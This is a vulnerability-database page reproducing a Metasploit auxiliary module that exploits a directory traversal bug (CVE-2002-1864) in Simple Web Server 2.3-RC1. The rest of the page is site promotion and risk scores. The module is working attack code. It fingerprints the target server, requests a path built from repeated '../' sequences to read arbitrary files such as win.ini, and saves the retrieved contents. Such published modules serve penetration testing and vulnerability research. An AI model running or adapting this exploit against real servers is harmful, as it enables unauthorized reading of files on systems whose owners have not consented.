Vulners
Lucene search
Simple Web Server 2.3-RC1 Directory Traversal
🗓️ 01 Sep 2024 00:00:00Reported by sinn3r, CwG GeNiuS, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 142 Views
| Reporter | Title | Published | Views | Family All 6 |
|---|---|---|---|---|
 | CVE-2002-1864 | 29 May 201815:50 | – | circl |
 | CVE-2002-1864 | 28 Jun 200504:00 | – | cve |
 | CVE-2002-1864 | 28 Jun 200504:00 | – | cvelist |
 | Simple Web Server 2.3-RC1 Directory Traversal | 6 Feb 201323:02 | – | metasploit |
 | CVE-2002-1864 | 31 Dec 200205:00 | – | nvd |
 | CVE-2002-1864 | 21 May 202520:25 | – | redhatcve |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Simple Web Server 2.3-RC1 Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability found in
Simple Web Server 2.3-RC1.
},
'References' =>
[
[ 'CVE', '2002-1864' ],
[ 'OSVDB', '88877' ],
[ 'EDB', '23886' ],
[ 'URL', 'https://seclists.org/bugtraq/2013/Jan/12' ]
],
'Author' =>
[
'CwG GeNiuS',
'sinn3r'
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2013-01-03'
))
register_options(
[
OptString.new('FILEPATH', [true, 'The name of the file to download', 'windows\\win.ini']),
OptInt.new('DEPTH', [true, 'The max traversal depth', 8])
])
end
#
# The web server will actually return two HTTP statuses: A 400 (Bad Request), and the actual
# HTTP status -- the second one is what we want. We cannot use the original update_cmd_parts()
# in Response, because that will only grab the first HTTP status.
#
def parse_status_line(res)
str = res.to_s
status_line = str.scan(/HTTP\/(.+?)\s+(\d+)\s?(.+?)\r?\n?$/)
if status_line.empty?
print_error("Invalid response command string.")
return
elsif status_line.length == 1
proto, code, message = status_line[0]
else
proto, code, message = status_line[1]
end
return message, code.to_i, proto
end
#
# The MSF API cannot parse this weird response
#
def parse_body(res)
str = res.to_s
str.split(/\r\n\r\n/)[2] || ''
end
def is_sws?
res = send_request_raw({'uri'=>'/'})
if res and res.headers['Server'].to_s =~ /PMSoftware\-SWS/
return true
else
return false
end
end
def run_host(ip)
if not is_sws?
print_error("#{ip}:#{rport} - This isn't a Simple Web Server")
return
end
uri = normalize_uri("../"*datastore['DEPTH'], datastore['FILEPATH'])
res = send_request_raw({'uri'=>uri})
if not res
print_error("#{ip}:#{rport} - Request timed out.")
return
end
# The weird HTTP response totally messes up Rex::Proto::Http::Response, HA!
message, code, proto = parse_status_line(res)
body = parse_body(res)
if code == 200
if body.empty?
# HD's likes vprint_* in case it's hitting a large network
vprint_status("#{ip}:#{rport} - File is empty.")
return
end
vprint_line(body)
fname = ::File.basename(datastore['FILEPATH'])
p = store_loot('simplewebserver.file', 'application/octet-stream', ip, body, fname)
print_good("#{ip}:#{rport} - #{fname} stored in: #{p}")
else
print_error("#{ip}:#{rport} - Unable to retrieve file: #{code.to_s} (#{message})")
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Sep 2024 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
EPSS0.59336